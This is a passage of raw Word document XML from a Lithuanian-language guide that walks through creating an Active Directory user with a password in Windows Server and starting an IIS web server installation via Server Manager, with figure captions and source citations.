    <w:p w14:paraId="72BB3A8E" w14:textId="77777777" w:rsidR="00AB2CF0" w:rsidRPr="005A5C28" w:rsidRDefault="00AB2CF0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E85F42" w14:textId="07EB40F7" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Slaptažodžio kūrimas naujam vartotojui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2535FCFA" w14:textId="3DBBBF2A" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F134DE9" w14:textId="3C103EE0" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="50C19713" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F14C41" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="081B3B8A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="05A89AE9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="00CA63A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidR="4E7C13C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04FAB0" w14:textId="34F5F18C" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pasirodys antrasis naujo objekto - vartotojo vedlio puslapis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835EAF8" w14:textId="304F060A" w:rsidR="06789CA6" w:rsidRPr="005A5C28" w:rsidRDefault="3BA33BFD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43AD9CEE" wp14:editId="18043C66">
            <wp:extent cx="2794000" cy="2374900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="241347756" name="Paveikslėlis 24134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1347756"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId218">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2794000" cy="2374900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF8CBB" w14:textId="1C700225" w:rsidR="2216EF43" w:rsidRPr="005A5C28" w:rsidRDefault="2216EF43" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidR="06789CA6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pav. Slaptažodžio kūrimas</w:t>
      </w:r>
      <w:r w:rsidR="1E095E0C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir įvedimas</w:t>
      </w:r>
      <w:r w:rsidR="06789CA6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC5D76" w14:textId="5CE679E0" w:rsidR="06789CA6" w:rsidRPr="005A5C28" w:rsidRDefault="06789CA6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Hlk66829164"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: </w:t>
      </w:r>
      <w:r w:rsidR="005A4208" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ramabadran </w:t>
      </w:r>
      <w:r w:rsidR="009A47F3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">V. (2019, balandžio 11). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows server 2019 Step-By-Step: Setup Active Directory environment using PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F45ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft TechNet. </w:t>
      </w:r>
      <w:r w:rsidR="000D5A75" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://social.technet.microsoft.com/wiki/contents/articles/52765.windows-server-2019-step-by-step-setup-active-directory-environment-using-powershell.aspx#Step_1_Login_as_Local_Admin</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:p w14:paraId="60DD3F7D" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789916F2" w14:textId="292B4367" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="12C63AEA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="007F4785" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="15EDC5F1" w:rsidRPr="005A5C28">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="081B3B8A" w:rsidRPr="005A5C28">
        <w:t>u kartus įveskite slaptažodį.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52049488" w14:textId="6E0434D7" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="3647EB45" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="007F4785" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="081B3B8A" w:rsidRPr="005A5C28">
        <w:t>Nurodykite slaptažodžio parinktis, kurias norite taikyti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11601951" w14:textId="36EF7F53" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="5C1710C8" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="000605DA" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="081B3B8A" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">Spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="35F8B3F6" w:rsidRPr="005A5C28">
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="081B3B8A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pirmyn</w:t>
      </w:r>
      <w:r w:rsidR="0560B296" w:rsidRPr="005A5C28">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="081B3B8A" w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A20FB4" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jūs pateksite į paskutinį naujo objekto - naudotojo vedlio puslapį.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC3EFA1" w14:textId="0405267C" w:rsidR="7C6D9145" w:rsidRPr="005A5C28" w:rsidRDefault="2B4C19D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62C074FE" wp14:editId="2EDB536F">
            <wp:extent cx="2880116" cy="2448099"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1794365402" name="Paveikslėlis 179436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94365402"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880116" cy="2448099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B8E89" w14:textId="03697664" w:rsidR="6FD6048F" w:rsidRPr="005A5C28" w:rsidRDefault="6FD6048F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="7B275838" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7C6D9145" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pav. </w:t>
      </w:r>
      <w:r w:rsidR="5FED6669" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naujas objektas</w:t>
      </w:r>
      <w:r w:rsidR="7C6D9145" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D07771A" w14:textId="77777777" w:rsidR="00E8021A" w:rsidRPr="005A5C28" w:rsidRDefault="00E8021A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Hlk66829333"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computingforgeeks. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p w14:paraId="5572D631" w14:textId="418904E8" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C13A3C4" w14:textId="0EC15009" w:rsidR="7C6D9145" w:rsidRPr="005A5C28" w:rsidRDefault="14167C61" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="000605DA" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="7C6D9145" w:rsidRPr="005A5C28">
        <w:t>Patikrinkite, ar informacija teisinga, tada spustelėkite Baigti, kad sukurtumėte paskyrą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03457438" w14:textId="28353E45" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0959CE" w14:textId="5CF8A8F0" w:rsidR="790CF0B6" w:rsidRPr="005A5C28" w:rsidRDefault="790CF0B6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tinklapio serverio diegimas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75E803" w14:textId="77777777" w:rsidR="00680AA3" w:rsidRPr="005A5C28" w:rsidRDefault="00680AA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5683060F" w14:textId="3A0E9862" w:rsidR="00680AA3" w:rsidRPr="005A5C28" w:rsidRDefault="00680AA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391844CB" w14:textId="48DBFAC2" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="00680AA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="000605DA" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t>aleiskite „</w:t>
      </w:r>
      <w:r w:rsidR="69CE9677" w:rsidRPr="005A5C28">
        <w:t>Serverio tvarkytuv</w:t>
      </w:r>
      <w:r w:rsidR="2548AA83" w:rsidRPr="005A5C28">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="26E3466B" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> (Server Manager)</w:t>
      </w:r>
      <w:r w:rsidR="000605DA" w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FCFD8" w14:textId="6144B7F0" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">Kaip ir visų </w:t>
      </w:r>
      <w:r w:rsidR="5FF4AD6D" w:rsidRPr="005A5C28">
        <w:t>rolių (Windows Server)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> atveju, norėdami pradėti diegimą, turi</w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:t>te</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>eiti į „</w:t>
      </w:r>
      <w:r w:rsidR="7079081B" w:rsidRPr="005A5C28">
        <w:t>Serverio tvarkytuvą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">“. Paspauskite „Windows“ klavišą ir ieškokite </w:t>
      </w:r>
      <w:r w:rsidR="7E1727E9" w:rsidRPr="005A5C28">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">erverio tvarkyklės, jei ji dar nėra atidaryta. </w:t>
      </w:r>
      <w:r w:rsidR="4957EFEB" w:rsidRPr="005A5C28">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">pustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">„Pridėti </w:t>
      </w:r>
      <w:r w:rsidR="1AAEFBE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rolę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ir funkcijas“</w:t>
      </w:r>
      <w:r w:rsidR="2C7AB526" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A434C4" w14:textId="09C77D5A" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04855279" w14:textId="70085A8A" w:rsidR="53ECFB9D" w:rsidRPr="005A5C28" w:rsidRDefault="1088CDB0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4028A8AE" wp14:editId="64943480">
            <wp:extent cx="4572000" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2125875239" name="Paveikslėlis 212587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25875239"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId220">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314A5083" w14:textId="140DB2CD" w:rsidR="70FC8B10" w:rsidRPr="005A5C28" w:rsidRDefault="70FC8B10" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>12 pav. Server Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43C50C" w14:textId="15E6BD99" w:rsidR="00A342AC" w:rsidRPr="005A5C28" w:rsidRDefault="00A342AC" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computingforgeeks. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId221" w:history="1">
        <w:r w:rsidR="00562646" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00562646" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5590F193" w14:textId="003BE518" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6680E4B9" w14:textId="6A96CE99" w:rsidR="53ECFB9D" w:rsidRPr="005A5C28" w:rsidRDefault="1088CDB0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
